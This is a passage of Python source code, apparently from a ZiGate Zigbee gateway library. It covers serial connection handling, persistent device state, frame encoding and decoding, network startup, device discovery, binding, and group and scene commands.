dispatch_signal(ZIGATE_PACKET_RECEIVED, self, packet=packet)
t = threading.Thread(target=self.decode_data, args=(packet,),
name='ZiGate-Decode data')
t.setDaemon(True)
t.start()
else:
sleep(SLEEP_INTERVAL)
def setup_connection(self):
self.connection = ThreadSerialConnection(self, self._port)
def close(self):
self._closing = True
if self._autosavetimer:
self._autosavetimer.cancel()
try:
if self.connection:
self.connection.close()
except Exception:
LOGGER.error('Exception during closing')
LOGGER.error(traceback.format_exc())
self.connection = None
self._started = False
def save_state(self, path=None):
LOGGER.debug('Saving persistent file')
path = path or self._path
if path is None:
LOGGER.warning('Persistent file is disabled')
if self._autosavetimer:
self._autosavetimer.cancel()
return
self._path = os.path.expanduser(path)
LOGGER.debug('Acquire Lock to save persistent file')
r = self._save_lock.acquire(True, 5)
if not r:
LOGGER.error('Failed to acquire Lock to save persistent file')
return
try:
data = {'devices': list(self._devices.values()),
'groups': self._groups,
'scenes': self._scenes,
'neighbours_table': self._neighbours_table_cache,
'led': self._led
}
with open(self._path, 'w') as fp:
json.dump(data, fp, cls=DeviceEncoder,
sort_keys=True, indent=4, separators=(',', ': '))
except Exception:
LOGGER.error('Failed to save persistent file %s', self._path)
LOGGER.error(traceback.format_exc())
LOGGER.debug('Release Lock of persistent file')
self._save_lock.release()
def load_state(self, path=None):
LOGGER.debug('Try loading persistent file')
path = path or self._path
if path is None:
LOGGER.warning('Persistent file is disabled')
return
self._path = os.path.expanduser(path)
LOGGER.debug('Trying to load %s', self._path)
if not os.path.exists(self._path):
LOGGER.warning('Persistent file %s doesn\'t exist', self._path)
return False
try:
with open(self._path) as fp:
data = json.load(fp)
if not isinstance(data, dict): # old version
data = {'devices': data, 'groups': {}}
groups = data.get('groups', {})
for k, v in groups.items():
groups[k] = set([tuple(r) for r in v])
self._groups = groups
self._scenes = data.get('scenes', {})
self._led = data.get('led', True)
self._neighbours_table_cache = data.get('neighbours_table', [])
LOGGER.debug('Load neighbours cache: %s', self._neighbours_table_cache)
devices = data.get('devices', [])
for data in devices:
try:
device = Device.from_json(data, self)
self._devices[device.addr] = device
device._create_actions()
except Exception:
LOGGER.error('Error loading device %s', data)
LOGGER.debug('Load success')
return True
except Exception:
LOGGER.error('Failed to load persistent file %s', self._path)
LOGGER.error(traceback.format_exc())
LOGGER.debug('No file to load')
return False
def start_auto_save(self):
LOGGER.debug('Auto saving %s', self._path)
self.save_state()
self._autosavetimer = threading.Timer(AUTO_SAVE, self.start_auto_save)
self._autosavetimer.setDaemon(True)
self._autosavetimer.start()
# check if we're still connected to zigate
if self.send_data(0x0010) is None:
self.connection.reconnect()
def __del__(self):
self.close()
def _start_event_thread(self):
self._event_thread = threading.Thread(target=self._event_loop,
name='ZiGate-Event Loop')
self._event_thread.setDaemon(True)
self._event_thread.start()
def autoStart(self, channel=None):
self.startup(channel)
def startup(self, channel=None):
'''
Startup sequence:
- Load persistent file
- setup connection
- Set Channel mask
- Set Type Coordinator
- Start Network
- Refresh devices list
'''
if self._started:
return
self._closing = False
self._start_event_thread()
self.load_state()
self.setup_connection()
self.set_led(self._led)
version = self.get_version()
self.set_channel(channel)
self.set_type(TYPE_COORDINATOR)
LOGGER.debug('Check network state')
# self.start_network()
network_state = self.get_network_state()
if not network_state:
LOGGER.error('Failed to get network state')
if not network_state or network_state.get('extended_panid') == 0 or \
network_state.get('addr') == 'ffff':
LOGGER.debug('Network is down, start it')
self.start_network(True)
tries = 3
while tries > 0:
sleep(1)
tries -= 1
network_state = self.get_network_state()
if network_state and \
network_state.get('extended_panid') != 0 and \
network_state.get('addr') != 'ffff':
break
if tries <= 0:
LOGGER.error('Failed to start network')
self.reset()
return
if version and version['version'] >= '3.1a':
LOGGER.debug('Set Zigate normal mode (firmware >= 3.1a)')
self.set_raw_mode(False)
if version and version['version'] >= '3.0f':
LOGGER.debug('Set Zigate Time (firmware >= 3.0f)')
self.set_time()
self.get_devices_list(True)
t = threading.Thread(target=self.need_discovery)
t.setDaemon(True)
t.start()
# self.need_discovery()
def need_discovery(self):
'''
scan device which need discovery
auto discovery if possible
else dispatch signal
'''
for device in self.devices:
if device.need_discovery():
if device.receiver_on_when_idle():
LOGGER.debug('Auto discover device %s', device)
device.discover_device()
else:
dispatch_signal(ZIGATE_DEVICE_NEED_DISCOVERY,
self, **{'zigate': self,
'device': device})
def zigate_encode(self, data):
encoded = bytearray()
for b in data:
if b < 0x10:
encoded.extend([0x02, 0x10 ^ b])
else:
encoded.append(b)
return encoded
def zigate_decode(self, data):
flip = False
decoded = bytearray()
for b in data:
if flip:
flip = False
decoded.append(b ^ 0x10)
elif b == 0x02:
flip = True
else:
decoded.append(b)
return decoded
def checksum(self, *args):
chcksum = 0
for arg in args:
if isinstance(arg, int):
chcksum ^= arg
continue
for x in arg:
chcksum ^= x
return chcksum
def send_to_transport(self, data):
if not self.connection or not self.connection.is_connected():
LOGGER.error('Not connected to zigate')
return
self.connection.send(data)
def send_data(self, cmd, data="", wait_response=None, wait_status=True):
'''
send data through ZiGate
'''
LOGGER.debug('REQUEST : 0x{:04x} {}'.format(cmd, data))
self._last_status[cmd] = None
if wait_response:
self._clear_response(wait_response)
if isinstance(cmd, int):
byte_cmd = struct.pack('!H', cmd)
elif isinstance(data, str):
byte_cmd = bytes.fromhex(cmd)
else:
byte_cmd = cmd
if isinstance(data, str):
byte_data = bytes.fromhex(data)
else:
byte_data = data
assert type(byte_cmd) == bytes
assert type(byte_data) == bytes
length = len(byte_data)
byte_length = struct.pack('!H', length)
checksum = self.checksum(byte_cmd, byte_length, byte_data)
msg = struct.pack('!HHB%ds' % length, cmd, length, checksum, byte_data)
LOGGER.debug('Msg to send %s', hexlify(msg))
enc_msg = self.zigate_encode(msg)
enc_msg.insert(0, 0x01)
enc_msg.append(0x03)
encoded_output = bytes(enc_msg)
LOGGER.debug('Encoded Msg to send %s', hexlify(encoded_output))
self.send_to_transport(encoded_output)
if wait_status:
status = self._wait_status(cmd)
if wait_response and status is not None:
r = self._wait_response(wait_response)
return r
return status
return False
def decode_data(self, packet):
'''
Decode raw packet message
'''
try:
decoded = self.zigate_decode(packet[1:-1])
msg_type, length, checksum, value, lqi = \
struct.unpack('!HHB%dsB' % (len(decoded) - 6), decoded)
except Exception:
LOGGER.error('Failed to decode packet : %s', hexlify(packet))
return
if length != len(value) + 1: # add lqi length
LOGGER.error('Bad length %s != %s : %s', length, len(value) + 1, value)
return
computed_checksum = self.checksum(decoded[:4], lqi, value)
if checksum != computed_checksum:
LOGGER.error('Bad checksum %s != %s', checksum, computed_checksum)
return
LOGGER.debug('Received response 0x{:04x}: {}'.format(msg_type, hexlify(value)))
try:
response = RESPONSES.get(msg_type, Response)(value, lqi)
except Exception:
LOGGER.error('Error decoding response 0x{:04x}: {}'.format(msg_type, hexlify(value)))
LOGGER.error(traceback.format_exc())
return
if msg_type != response.msg:
LOGGER.warning('Unknown response 0x{:04x}'.format(msg_type))
LOGGER.debug(response)
self._last_response[msg_type] = response
self.interpret_response(response)
dispatch_signal(ZIGATE_RESPONSE_RECEIVED, self, response=response)
def interpret_response(self, response):
if response.msg == 0x8000: # status
if response['status'] != 0:
LOGGER.error('Command 0x{:04x} failed {} : {}'.format(response['packet_type'],
response.status_text(),
response['error']))
self._last_status[response['packet_type']] = response
elif response.msg == 0x8011: # APS_DATA_ACK
if response['status'] != 0:
LOGGER.error('Device {} doesn\'t receive last command to '
'endpoint {} cluster {}: 0x{:02x}'.format(response['addr'],
response['endpoint'],
response['cluster'],
response['status']))
elif response.msg == 0x8007: # factory reset
if response['status'] == 0:
self._devices = {}
self.start_network()
elif response.msg == 0x8015: # device list
keys = set(self._devices.keys())
known_addr = set([d['addr'] for d in response['devices']])
LOGGER.debug('Known devices in zigate : %s', known_addr)
missing = keys.difference(known_addr)
LOGGER.debug('Previous devices missing : %s', missing)
for addr in missing:
self._tag_missing(addr)
# self._remove_device(addr)
for d in response['devices']:
if d['ieee'] == '0000000000000000':
continue
device = Device(dict(d), self)
self._set_device(device)
elif response.msg == 0x8035: # PDM event
LOGGER.warning('PDM Event : %s %s', response['status'], response.status_text())
elif response.msg == 0x8042: # node descriptor
addr = response['addr']
d = self.get_device_from_addr(addr)
if d:
d.update_info(response.cleaned_data())
self.discover_device(addr)
elif response.msg == 0x8043: # simple descriptor
addr = response['addr']
endpoint = response['endpoint']
d = self.get_device_from_addr(addr)
if d:
ep = d.get_endpoint(endpoint)
ep.update(response.cleaned_data())
ep['in_clusters'] = response['in_clusters']
ep['out_clusters'] = response['out_clusters']
self.discover_device(addr)
d._create_actions()
elif response.msg == 0x8045: # endpoint list
addr = response['addr']
d = self.get_device_from_addr(addr)
if d:
for endpoint in response['endpoints']:
ep = d.get_endpoint(endpoint['endpoint'])
self.simple_descriptor_request(addr, endpoint['endpoint'])
self.discover_device(addr)
elif response.msg == 0x8048: # leave
device = self.get_device_from_ieee(response['ieee'])
if device:
if response['rejoin_status'] == 1:
device.missing = True
else:
self._remove_device(device.addr)
elif response.msg == 0x8062: # Get group membership response
data = response.cleaned_data()
self._sync_group_membership(data['addr'], data['endpoint'], data['groups'])
elif response.msg in (0x8100, 0x8102, 0x8110, 0x8401,
0x8085, 0x8095, 0x80A7): # attribute report or IAS Zone status change
if response.get('status', 0) != 0:
LOGGER.debug('Received Bad status')
# handle special case, no model identifier
if response['status'] == 0x86 and response['cluster'] == 0 and response['attribute'] == 5:
response['data'] = 'unsupported'
else:
return
# ignore if related to zigate
if response['addr'] == self.addr:
return
device = self._get_device(response['addr'])
device.lqi = response['lqi']
device.set_attribute(response['endpoint'],
response['cluster'],
response.cleaned_data())
elif response.msg == 0x004D: # device announce
LOGGER.debug('Device Announce %s', response)
device = Device(response.data, self)
self._set_device(device)
elif response.msg == 0x8140: # attribute discovery
if 'addr' in response:
# ignore if related to zigate
if response['addr'] == self.addr:
return
device = self._get_device(response['addr'])
device.set_attribute(response['endpoint'],
response['cluster'],
response.cleaned_data())
elif response.msg == 0x8501: # OTA image block request
LOGGER.debug('Client is requesting ota image data')
self._ota_send_image_data(response)
elif response.msg == 0x8503: # OTA Upgrade end request
LOGGER.debug('Client ended ota process')
self._ota_handle_upgrade_end_request(response)
elif response.msg == 0x8702: # APS Data confirm Fail
LOGGER.warning(response)
# else:
# LOGGER.debug('Do nothing special for response {}'.format(response))
def _get_device(self, addr):
'''
get device from addr
create it if necessary
'''
d = self.get_device_from_addr(addr)
if not d:
LOGGER.warning('Device not found, create it (this isn\'t normal)')
d = Device({'addr': addr}, self)
self._set_device(d)
self.get_devices_list() # since device is missing, request info
return d
def _tag_missing(self, addr):
'''
tag a device as missing
'''
last_24h = datetime.datetime.now() - datetime.timedelta(hours=24)
last_24h = last_24h.strftime('%Y-%m-%d %H:%M:%S')
if addr in self._devices:
if self._devices[addr].last_seen and self._devices[addr].last_seen < last_24h:
self._devices[addr].missing = True
LOGGER.warning('The device %s is missing', addr)
dispatch_signal(ZIGATE_DEVICE_UPDATED,
self, **{'zigate': self,
'device': self._devices[addr]})
def get_missing(self):
'''
return missing devices
'''
return [device for device in self._devices.values() if device.missing]
def cleanup_devices(self):
'''
remove devices tagged missing
'''
to_remove = [device.addr for device in self.get_missing()]
for addr in to_remove:
self._remove_device(addr)
def _remove_device(self, addr):
'''
remove device from addr
'''
device = self._devices.pop(addr)
dispatch_signal(ZIGATE_DEVICE_REMOVED, **{'zigate': self,
'addr': addr,
'device': device})
def _set_device(self, device):
'''
add/update device to cache list
'''
assert type(device) == Device
if device.addr in self._devices:
self._devices[device.addr].update(device)
dispatch_signal(ZIGATE_DEVICE_UPDATED, self, **{'zigate': self,
'device': self._devices[device.addr]})
else:
# check if device already exist with other address
d = self.get_device_from_ieee(device.ieee)
if d:
LOGGER.warning('Device already exists with another addr %s, rename it.', d.addr)
old_addr = d.addr
new_addr = device.addr
d.discovery = ''
d.update(device)
self._devices[new_addr] = d
del self._devices[old_addr]
dispatch_signal(ZIGATE_DEVICE_ADDRESS_CHANGED, self,
**{'zigate': self,
'device': d,
'old_addr': old_addr,
'new_addr': new_addr,
})
else:
self._devices[device.addr] = device
dispatch_signal(ZIGATE_DEVICE_ADDED, self, **{'zigate': self,
'device': device})
self.discover_device(device.addr)
def get_status_text(self, status_code):
return STATUS_CODES.get(status_code,
'Failed with event code: %s', status_code)
def _clear_response(self, msg_type):
if msg_type in self._last_response:
del self._last_response[msg_type]
def _wait_response(self, msg_type):
'''
wait for next msg_type response
'''
LOGGER.debug('Waiting for message 0x{:04x}'.format(msg_type))
t1 = monotonic()
while self._last_response.get(msg_type) is None:
sleep(0.01)
t2 = monotonic()
if t2 - t1 > WAIT_TIMEOUT: # no response timeout
LOGGER.warning('No response waiting command 0x{:04x}'.format(msg_type))
return
LOGGER.debug('Stop waiting, got message 0x{:04x}'.format(msg_type))
return self._last_response.get(msg_type)
def _wait_status(self, cmd):
'''
wait for status of cmd
'''
LOGGER.debug('Waiting for status message for command 0x{:04x}'.format(cmd))
t1 = monotonic()
while self._last_status.get(cmd) is None:
sleep(0.01)
t2 = monotonic()
if t2 - t1 > WAIT_TIMEOUT: # no response timeout
self._no_response_count += 1
LOGGER.warning('No response after command 0x{:04x} ({})'.format(cmd, self._no_response_count))
return
self._no_response_count = 0
LOGGER.debug('STATUS code to command 0x{:04x}:{}'.format(cmd, self._last_status.get(cmd)))
return self._last_status.get(cmd)
def __addr(self, addr):
''' convert hex string addr to int '''
if isinstance(addr, str):
addr = int(addr, 16)
return addr
def __haddr(self, int_addr, length=4):
''' convert int addr to hex '''
return '{0:0{1}x}'.format(int_addr, length)
@property
def devices(self):
return list(self._devices.values())
def get_device_from_addr(self, addr):
return self._devices.get(addr)
def get_device_from_ieee(self, ieee):
if ieee:
for d in self._devices.values():
if d.ieee == ieee:
return d
def get_devices_list(self, wait=False):
'''
refresh device list from zigate
'''
wait_response = None
if wait:
wait_response = 0x8015
self.send_data(0x0015, wait_response=wait_response)
def set_raw_mode(self, enable=True):
'''
Set Blue Led state ON/OFF
'''
data = struct.pack('!B', enable)
return self.send_data(0x0002, data)
def get_version(self, refresh=False):
'''
get zigate firmware version
'''
if not self._version or refresh:
r = self.send_data(0x0010, wait_response=0x8010)
if r:
self._version = r.data
else:
LOGGER.warning('Failed to retrieve zigate firmware version')
return self._version
def get_version_text(self, refresh=False):
'''
get zigate firmware version as text
'''
v = self.get_version(refresh)
if v:
return v['version']
def reset(self):
'''
reset zigate
'''
return self.send_data(0x0011, wait_status=False)
def erase_persistent(self):
'''
erase persistent data in zigate
'''
return self.send_data(0x0012, wait_status=False)
def factory_reset(self):
'''
ZLO/ZLL "Factory New" Reset
'''
return self.send_data(0x0013, wait_status=False)
def is_permitting_join(self):
'''
check if zigate is permitting join
'''
r = self.send_data(0x0014, wait_response=0x8014)
if r:
r = r.get('status', False)
return r
def set_time(self, dt=None):
'''
Set internal zigate time
dt should be datetime.datetime object
'''
dt = dt or datetime.datetime.now()
# timestamp from 2000-01-01 00:00:00
timestamp = int((dt - datetime.datetime(2000, 1, 1)).total_seconds())
data = struct.pack('!L', timestamp)
self.send_data(0x0016, data)
def get_time(self):
'''
get internal zigate time
'''
r = self.send_data(0x0017, wait_response=0x8017)
dt = None
if r:
timestamp = r.get('timestamp')
dt = datetime.datetime(2000, 1, 1) + datetime.timedelta(seconds=timestamp)
return dt
def set_led(self, on=True):
'''
Set Blue Led state ON/OFF
'''
self._led = on
data = struct.pack('!?', on)
return self.send_data(0x0018, data)
def set_certification(self, standard='CE'):
'''
Set Certification CE=1, FCC=2
'''
cert = {'CE': 1, 'FCC': 2}
data = struct.pack('!B', cert[standard])
return self.send_data(0x0019, data)
def permit_join(self, duration=60):
'''
start permit join
duration in secs, 0 means stop permit join
'''
return self.send_data(0x0049, 'FFFC{:02X}00'.format(duration))
def stop_permit_join(self):
'''
convenient function to stop permit_join
'''
return self.permit_join(0)
def set_extended_panid(self, panid):
'''
Set Extended PANID
'''
data = struct.pack('!Q', panid)
return self.send_data(0x0020, data)
def set_channel(self, channels=None):
'''
set channel
'''
channels = channels or [11, 14, 15, 19, 20, 24, 25, 26]
if not isinstance(channels, list):
channels = [channels]
mask = functools.reduce(lambda acc, x: acc ^ 2 ** x, channels, 0)
mask = struct.pack('!I', mask)
return self.send_data(0x0021, mask)
def set_type(self, typ=TYPE_COORDINATOR):
'''
set zigate mode type
'''
data = struct.pack('!B', typ)
self.send_data(0x0023, data)
def get_network_state(self):
''' get network state '''
r = self.send_data(0x0009, wait_response=0x8009)
if r:
data = r.cleaned_data()
self._addr = data['addr']
self._ieee = data['ieee']
self.panid = data['panid']
self.extended_panid = data['extended_panid']
self.channel = data['channel']
return data
def start_network(self, wait=False):
''' start network '''
wait_response = None
if wait:
wait_response = 0x8024
r = self.send_data(0x0024, wait_response=wait_response)
if wait and r:
data = r.cleaned_data()
if 'addr' in data:
self._addr = data['addr']
self._ieee = data['ieee']
self.channel = data['channel']
return r
def start_network_scan(self):
''' start network scan '''
return self.send_data(0x0025)
def remove_device(self, addr, force=False):
''' remove device '''
if addr in self._devices:
ieee = self._devices[addr].ieee
if not ieee:
LOGGER.warning('No ieee for %s, silently removing the device', self._devices[addr])
self._remove_device(addr)
else:
ieee = self.__addr(ieee)
zigate_ieee = self.__addr(self.ieee)
data = struct.pack('!QQ', zigate_ieee, ieee)
if force:
self._remove_device(addr)
return self.send_data(0x0026, data)
def remove_device_ieee(self, ieee):
''' remove device '''
device = self.get_device_from_ieee(ieee)
if device:
self.remove_device(device.addr)
def enable_permissions_controlled_joins(self, enable=True):
'''
Enable Permissions Controlled Joins
'''
enable = 1 if enable else 2
data = struct.pack('!B', enable)
return self.send_data(0x0027, data)
def _choose_addr_mode(self, addr_ieee):
'''
Choose the right address mode
'''
if len(addr_ieee) == 4:
addr_fmt = 'H'
if addr_ieee in self._groups:
addr_mode = 1 # AddrMode.group
elif addr_ieee in self._devices:
addr_mode = 2 # AddrMode.short
else:
addr_mode = 0 # AddrMode.bound
else:
addr_mode = 3 # AddrMode.ieee
addr_fmt = 'Q'
return addr_mode, addr_fmt
def _translate_addr(self, addr_ieee):
'''
translate ieee to addr if needed
'''
if len(addr_ieee) > 4:
return self.get_addr(addr_ieee)
return addr_ieee
def get_addr(self, ieee):
'''
retrieve short addr from ieee
'''
for d in self._devices.values():
if d.ieee == ieee:
return d.addr
LOGGER.error('Failed to retrieve short address for %s', ieee)
def _bind_unbind(self, cmd, ieee, endpoint, cluster,
dst_addr=None, dst_endpoint=1):
'''
bind
if dst_addr not specified, supposed zigate
'''
if not dst_addr:
dst_addr = self.ieee
addr_mode, addr_fmt = self._choose_addr_mode(dst_addr)
ieee = self.__addr(ieee)
dst_addr = self.__addr(dst_addr)
data = struct.pack('!QBHB' + addr_fmt + 'B', ieee, endpoint,
cluster, addr_mode, dst_addr, dst_endpoint)
wait_response = cmd + 0x8000
return self.send_data(cmd, data, wait_response)
def bind(self, ieee, endpoint, cluster, dst_addr=None, dst_endpoint=1):
'''
bind
if dst_addr not specified, supposed zigate
'''
return self._bind_unbind(0x0030, ieee, endpoint, cluster,
dst_addr, dst_endpoint)
def bind_addr(self, addr, endpoint, cluster, dst_addr=None,
dst_endpoint=1):
'''
bind using addr
if dst_addr not specified, supposed zigate
convenient function to use addr instead of ieee
'''
if addr in self._devices:
ieee = self._devices[addr].ieee
if ieee:
return self.bind(ieee, endpoint, cluster, dst_addr, dst_endpoint)
LOGGER.error('Failed to bind, addr %s, IEEE is missing', addr)
LOGGER.error('Failed to bind, addr %s unknown', addr)
def unbind(self, ieee, endpoint, cluster, dst_addr=None, dst_endpoint=1):
'''
unbind
if dst_addr not specified, supposed zigate
'''
return self._bind_unbind(0x0031, ieee, endpoint, cluster,
dst_addr, dst_endpoint)
def unbind_addr(self, addr, endpoint, cluster, dst_addr='0000',
dst_endpoint=1):
'''
unbind using addr
if dst_addr not specified, supposed zigate
convenient function to use addr instead of ieee
'''
if addr in self._devices:
ieee = self._devices[addr]['ieee']
return self.unbind(ieee, endpoint, cluster, dst_addr, dst_endpoint)
LOGGER.error('Failed to bind, addr %s unknown', addr)
def network_address_request(self, ieee):
''' network address request '''
target_addr = self.__addr('0000')
ieee = self.__addr(ieee)
data = struct.pack('!HQBB', target_addr, ieee, 0, 0)
r = self.send_data(0x0040, data, wait_response=0x8040)
if r:
return r.data['addr']
def ieee_address_request(self, addr):
''' ieee address request '''
target_addr = self.__addr('0000')
addr = self.__addr(addr)
data = struct.pack('!HHBB', target_addr, addr, 0, 0)
r = self.send_data(0x0041, data, wait_response=0x8041)
if r:
return r.data['ieee']
def node_descriptor_request(self, addr):
''' node descriptor request '''
return self.send_data(0x0042, addr)
def simple_descriptor_request(self, addr, endpoint):
'''
simple_descriptor_request
'''
addr = self.__addr(addr)
data = struct.pack('!HB', addr, endpoint)
return self.send_data(0x0043, data)
def power_descriptor_request(self, addr):
'''
power descriptor request
'''
return self.send_data(0x0044, addr)
def active_endpoint_request(self, addr):
'''
active endpoint request
'''
return self.send_data(0x0045, addr)
def leave_request(self, addr, ieee=None, rejoin=False,
remove_children=False):
'''
Management Leave request
rejoin : 0 do not rejoin, 1 rejoin
remove_children : 0 Leave, do not remove children
1 = Leave, removing children
'''
addr = self.__addr(addr)
if not ieee:
ieee = self._devices[addr]['ieee']
ieee = self.__addr(ieee)
data = struct.pack('!HQBB', addr, ieee, rejoin, remove_children)
return self.send_data(0x0047, data)
def lqi_request(self, addr='0000', index=0, wait=False):
'''
Management LQI request
'''
addr = self.__addr(addr)
data = struct.pack('!HB', addr, index)
wait_response = None
if wait:
wait_response = 0x804e
r = self.send_data(0x004e, data, wait_response=wait_response)
return r
def build_neighbours_table(self, force=False):
'''
Build neighbours table
'''
if force or not self._neighbours_table_cache:
if not self._building_neighbours_table:
self._building_neighbours_table = True
try:
self._neighbours_table_cache = self._neighbours_table()
finally:
self._building_neighbours_table = False
else:
LOGGER.warning('building neighbours table already started')
return self._neighbours_table_cache
def _neighbours_table(self, addr=None, nodes=None):
'''
Build neighbours table
'''
if addr is None:
addr = self.addr
if nodes is None:
nodes = []
LOGGER.debug('Search for children of %s', addr)
nodes.append(addr)
index = 0
neighbours = []
entries = 255
while index < entries:
r = self.lqi_request(addr, index, True)
if not r:
LOGGER.error('Failed to build neighbours table')
break
data = r.cleaned_data()
entries = data['entries']
for n in data['neighbours']:
# bit_field
# bit 0-1 = u2RxOnWhenIdle 0/1
# bit 2-3 = u2Relationship 0/1/2
# bit 4-5 = u2PermitJoining 0/1
# bit 6-7 = u2DeviceType 0/1/2
is_parent = n['bit_field'][2:4] == '00'
is_child = n['bit_field'][2:4] == '01'
is_router = n['bit_field'][6:8] == '01'
if is_parent:
neighbours.append((n['addr'], addr, n['lqi']))
elif is_child:
neighbours.append((addr, n['addr'], n['lqi']))
elif n['depth'] == 0:
neighbours.append((self.addr, n['addr'], n['lqi']))
if is_router and n['addr'] not in nodes:
LOGGER.debug('%s is a router, search for children', n['addr'])
n2 = self._neighbours_table(n['addr'], nodes)
if n2:
neighbours += n2
index += data['count']
return neighbours
def _neighbours_table2(self):
'''
Build neighbours table
'''
neighbours = []
LOGGER.debug('Build neighbours tables')
for addr in [self.addr] + [device.addr for device in self.devices]:
if addr != self.addr:
# Skip known Zigbee End Devices (not ZC or ZR)
device = self._get_device(addr)
if device and device.info and device.info.get('bit_field'):
logical_type = device.info['bit_field'][-2:]
if logical_type not in ('00', '01'):
LOGGER.debug('Skip gathering of neighbours for addr=%s (logical type=%s, device type=%s)',
addr, logical_type, device.get_type())
continue
LOGGER.debug('Gathering neighbours for addr=%s...', addr)
r = self.lqi_request(addr, 0, True)
if not r or r['status'] != 0:
LOGGER.error('Failed to request LQI for %s device', addr)
continue
data = r.cleaned_data()
# entries = data['entries']
for n in data['neighbours']:
# bit_field
# bit 0-1 = u2RxOnWhenIdle 0/1
# bit 2-3 = u2Relationship 0/1/2
# bit 4-5 = u2PermitJoining 0/1
# bit 6-7 = u2DeviceType 0/1/2
is_parent = n['bit_field'][2:4] == '00'
if is_parent:
entry = (n['addr'], addr, n['lqi'])
else:
entry = (addr, n['addr'], n['lqi'])
if entry not in neighbours:
neighbours.append(entry)
LOGGER.debug('Gathered neighbours for addr=%s: %s', addr, neighbours)
LOGGER.debug('Gathered neighbours table: %s', neighbours)
return neighbours
def refresh_device(self, addr, full=False, force=False):
'''
convenient function to refresh device attribute
if full is true, try to read all known attributes
else only some specific attributes related to known clusters.
if force is false, only refresh if the device has not been seen
for more than an one hour
'''
device = self.get_device_from_addr(addr)
if not device:
return
device.refresh_device(full, force)
def discover_device(self, addr, force=False):
'''
starts discovery process
'''
LOGGER.debug('discover_device %s', addr)
device = self.get_device_from_addr(addr)
if not device:
return
if force:
device.discovery = ''
device.info['mac_capability'] = ''
device.endpoints = {}
if device.discovery:
return
typ = device.get_type()
if typ:
LOGGER.debug('Found type')
if device.has_template():
LOGGER.debug('Found template, loading it')
device.load_template()
return
if not device.info.get('mac_capability'):
LOGGER.debug('no mac_capability')
self.node_descriptor_request(addr)
return
if not device.endpoints:
LOGGER.debug('no endpoints')
self.active_endpoint_request(addr)
return
if not typ:
return
if not device.load_template():
LOGGER.debug('Loading template failed, tag as auto-discovered')
device.discovery = 'auto-discovered'
for endpoint, values in device.endpoints.items():
for cluster in values.get('in_clusters', []):
self.attribute_discovery_request(addr, endpoint, cluster)
def _generate_addr(self):
addr = None
while not addr or addr in self._devices or addr in self._groups:
addr = random.randint(1, 0xffff)
return addr
@property
def groups(self):
'''
return known groups
'''
return self._groups
def get_group_for_addr(self, addr):
'''
return group for device addr
'''
groups = {}
for group, members in self._groups.items():
for member in members:
if member[0] == addr:
if member[1] not in groups:
groups[member[1]] = []
groups[member[1]].append(group)
continue
return groups
def _add_group(self, cmd, addr, endpoint, group=None):
'''
Add group
if group addr not specified, generate one
return group addr
'''
addr_mode = 2
addr = self.__addr(addr)
if not group:
group = self._generate_addr()
else:
group = self.__addr(group)
src_endpoint = 1
data = struct.pack('!BHBBH', addr_mode, addr,
src_endpoint, endpoint, group)
r = self.send_data(cmd, data)
group_addr = self.__haddr(group)
if r.status == 0:
self.__add_group(group_addr, self.__haddr(addr), endpoint)
return group_addr
def __add_group(self, group, addr, endpoint):
if group not in self._groups:
self._groups[group] = set()
self._groups[group].add((addr, endpoint))
def __remove_group(self, group, addr, endpoint):
'''
remove group for specified addr, endpoint
if group is None,
remove all group for specified addr, endpoint
'''
if group is None:
groups = list(self._groups.keys())
else:
groups = [group]
for group in groups:
if (addr, endpoint) in self._groups.get(group, set()):
self._groups[group].remove((addr, endpoint))
if group in self._groups and len(self._groups[group]) == 0:
del self._groups[group]
def _sync_group_membership(self, addr, endpoint, groups):
for group in groups:
self.__add_group(group, addr, endpoint)
to_remove = []
for group in self._groups:
if group not in groups:
to_remove.append(group)
for group in to_remove:
self.__remove_group(group, addr, endpoint)
def add_group(self, addr, endpoint, group=None):
'''
Add group
if group addr not specified, generate one
return group addr
'''
return self._add_group(0x0060, addr, endpoint, group)
def add_group_identify(self, addr, endpoint, group=None):
'''
Add group if identify ??
if group addr not specified, generate one
return group addr
'''
return self._add_group(0x0065, addr, endpoint, group)
def view_group(self, addr, endpoint, group):
'''
View group
'''
addr_mode = 2
addr = self.__addr(addr)
group = self.__addr(group)
src_endpoint = 1
data = struct.pack('!BHBBH', addr_mode, addr,
src_endpoint, endpoint, group)
return self.send_data(0x0061, data)
def get_group_membership(self, addr, endpoint, groups=[]):
'''
Get group membership
groups is list of group addr
if empty get all groups
'''
addr_mode = 2
addr = self.__addr(addr)
src_endpoint = 1
length = len(groups)
groups = [self.__addr(group) for group in groups]
data = struct.pack('!BHBBB{}H'.format(length), addr_mode, addr,
src_endpoint, endpoint, length, *groups)
return self.send_data(0x0062, data)
def remove_group(self, addr, endpoint, group=None):
'''
Remove group
if group not specified, remove all groups
'''
addr_mode = 2
addr = self.__addr(addr)
src_endpoint = 1
group_addr = group
if group is None:
data = struct.pack('!BHBB', addr_mode, addr,
src_endpoint, endpoint)
r = self.send_data(0x0064, data)
else:
group = self.__addr(group)
data = struct.pack('!BHBBH', addr_mode, addr,
src_endpoint, endpoint, group)
r = self.send_data(0x0063, data)
if r.status == 0:
self.__remove_group(group_addr, self.__haddr(addr), endpoint)
return r
def identify_device(self, addr, time_sec=5):
'''
convenient function that automatically find destination endpoint
'''
device = self._devices[addr]
device.identify_device(time_sec)
def identify_send(self, addr, endpoint, time_sec):
'''
identify query
'''
addr = self.__addr(addr)
data = struct.pack('!BHBBH', 2, addr, 1, endpoint, time_sec)
return self.send_data(0x0070, data)
def identify_query(self, addr, endpoint):
'''
identify query
'''
addr = self.__addr(addr)
data = struct.pack('!BHBB', 2, addr, 1, endpoint)
return self.send_data(0x0071, data)
def view_scene(self, addr, endpoint, group, scene):
'''
View scene
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A0, data)
def add_scene(self, addr, endpoint, group, scene, name, transition=1):
'''
Add scene
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A1, data)
def remove_scene(self, addr, endpoint, group, scene=None):
'''
Remove scene
if scene is not specified, remove all scenes
'''
addr = self.__addr(addr)
group = self.__addr(group)
if scene is None:
data = struct.pack('!BHBBH', 2, addr, 1, endpoint, group)
return self.send_data(0x00A3, data)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A2, data)
def store_scene(self, addr, endpoint, group, scene):
'''
Store scene
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
